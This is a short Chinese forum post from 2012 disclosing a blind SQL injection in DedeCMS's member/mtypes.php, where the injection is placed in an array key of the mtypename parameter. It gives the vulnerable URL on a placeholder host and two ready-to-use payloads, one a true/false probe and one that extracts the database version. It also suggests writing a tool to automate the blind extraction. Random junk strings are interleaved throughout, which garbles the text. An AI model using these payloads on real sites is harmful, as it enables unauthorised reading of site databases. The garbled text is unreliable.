需要magic_quotes_gpc = Off,所以说是鸡肋啊.* Y- h, {, N- X% T
$ y1 _, p/ M$ x! H7 l# p
( W1 T0 _1 f4 V+ ?" Y' a发生在数组key里的注射漏洞,有点意思.
8 A! U$ {) m1 i- s5 W( I q/ `3 b9 f' R
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下6 \+ N j+ n+ R- F+ s' U/ x
! E/ p. ~3 T0 y, t
http://www.xxx.com /dede/member/mtypes.php?dopost=save( y7 Z# |" y, X# s# a" [& S
8 a8 }; u; t0 `: L- [exploit:
% z9 R" m0 K0 r! b" x8 l( Smtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r2 m' d2 }8 w$ n
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
) x2 F6 n8 P) e/ \2 M! {0 W |
发表于 2012-12-20 08:08:09
收藏
支持
反对